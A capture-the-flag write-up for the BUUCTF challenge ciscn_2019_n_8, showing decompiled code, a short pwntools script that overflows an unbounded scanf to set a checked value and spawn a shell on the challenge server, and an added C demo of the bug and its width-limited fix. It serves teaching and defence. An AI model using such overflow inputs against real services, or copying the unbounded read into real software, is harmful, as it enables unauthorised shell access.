[buuctf] pwn-ciscn_2019_n_8

ciscn_2019_n_8

First check the binary's protections:

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

A 32-bit binary with all protections enabled; load it into IDA and look at the decompiled main logic:

      var[13] = 0;
      var[14] = 0;
      init();
      puts("What's your name?");
      __isoc99_scanf("%s", var, v4, v5);   // no width limit: input runs past var[12] into var[13..14]
      if ( *(_QWORD *)&var[13] )            // var[13] and var[14] are read together as one 64-bit value
      {
        if ( *(_QWORD *)&var[13] == 17LL )  // the 8 bytes at var[13..14] must equal 17
          system("/bin/sh");
        else
          printf(
            "something wrong! val is %d",
            var[0],
            var[1],
            var[2],
            var[3],
            var[4],
            var[5],
            var[6],
            var[7],
            var[8],
            var[9],
            var[10],
            var[11],
            var[12],
            var[13],
            var[14]);
      }
      else
      {
        printf("%s, Welcome!\n", var);
        puts("Try do something~");
      }
      return 0;
    }

Somewhat unexpected: simply writing the right value into the array is enough to get through. The unbounded `scanf("%s")` lets the input reach `var[13]`, so 13 * 4 = 52 bytes of filler followed by 17 as an 8-byte little-endian value satisfies the check.

    from pwn import *

    r = remote('node3.buuoj.cn', 28597)
    # 13 ints * 4 bytes of filler reach var[13]; p64(17) then fills var[13..14]
    # with 17 as a little-endian 64-bit value, which is what the check compares.
    # pwntools on Python 3 needs a bytes payload, hence b'a'.
    payload = b'a' * 13 * 4 + p64(17)

    r.sendline(payload)
    r.interactive()
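To make the array layout concrete, and to show the one-line fix, here is an added C illustration that is not code from the writeup or from the challenge binary. It models the decompiled check on a 15-entry `int` array, copies the input with and without a width limit, and reads `var[13..14]` as one 64-bit value exactly as `*(_QWORD *)&var[13]` does. The function names (`hits_magic`, `check_unbounded`, `check_bounded`, `build_input`, `run_demo`) are my own, the unbounded `scanf("%s")` is modelled with a `memcpy` clamped to the array so the demo cannot corrupt its own stack, and a 4-byte `int` is assumed, matching the i386 target.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added illustration, not the challenge's own code: a 15-int array where the
 * input lands at var[0] and the program compares the 8 bytes at var[13..14]
 * with the value 17. */

#define NVARS       15
#define CHECK_INDEX 13                        /* *(_QWORD *)&var[13] */
#define VAR_BYTES   (NVARS * sizeof(int))     /* 60 bytes with 4-byte ints */
#define MAGIC       17ULL

/* Same test as the decompiled code: read var[13] and var[14] as one uint64. */
static int hits_magic(const int *var) {
    uint64_t v;
    memcpy(&v, &var[CHECK_INDEX], sizeof v);
    return v == MAGIC;
}

/* Models the original scanf("%s", var): no width limit, so input bytes 52..59
 * overwrite var[13] and var[14].  Clamped to the array here only so that this
 * demo itself stays memory-safe (assumption: the real read is not clamped). */
static int check_unbounded(const unsigned char *input, size_t len) {
    int var[NVARS];
    memset(var, 0, sizeof var);
    if (len > VAR_BYTES)
        len = VAR_BYTES;
    memcpy(var, input, len);
    return hits_magic(var);
}

/* The hardened form: a width limit equivalent to scanf("%51s", var) keeps the
 * string plus its NUL terminator inside var[0..12], so var[13] and var[14]
 * remain zero however long the input is. */
static int check_bounded(const unsigned char *input, size_t len) {
    int var[NVARS];
    size_t width = CHECK_INDEX * sizeof(int) - 1;   /* 51 characters + NUL */
    memset(var, 0, sizeof var);
    if (len > width)
        len = width;
    memcpy(var, input, len);
    return hits_magic(var);
}

/* Constructs the writeup's input: 52 filler bytes, then 17 as a little-endian
 * 64-bit value (what p64(17) yields).  Returns bytes written, 0 if cap is too small. */
static size_t build_input(unsigned char *out, size_t cap) {
    size_t fill = CHECK_INDEX * sizeof(int);   /* 13 * 4 = 52 */
    size_t total = fill + 8;
    if (cap < total)
        return 0;
    memset(out, 'a', fill);
    for (int i = 0; i < 8; i++)
        out[fill + i] = (unsigned char)((MAGIC >> (8 * i)) & 0xff);
    return total;
}

/* Runs the constructed input through either reader: 1 if the check is reached. */
static int run_demo(int bounded) {
    unsigned char input[64];
    size_t len = build_input(input, sizeof input);
    if (len == 0)
        return -1;
    return bounded ? check_bounded(input, len) : check_unbounded(input, len);
}

int main(void) {
    printf("unbounded read reaches the system() branch: %d\n", run_demo(0));
    printf("width-limited read reaches the system() branch: %d\n", run_demo(1));
    return 0;
}
```

The point for a defender is in `check_bounded`: the bug is not the comparison but the read, and a conversion width (`%51s`) or an `fgets` sized to the part of the buffer that is meant to hold the name is what keeps `var[13..14]` under the program's control rather than the user's.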

posted @ 2021-03-08 21:56  寒江寻影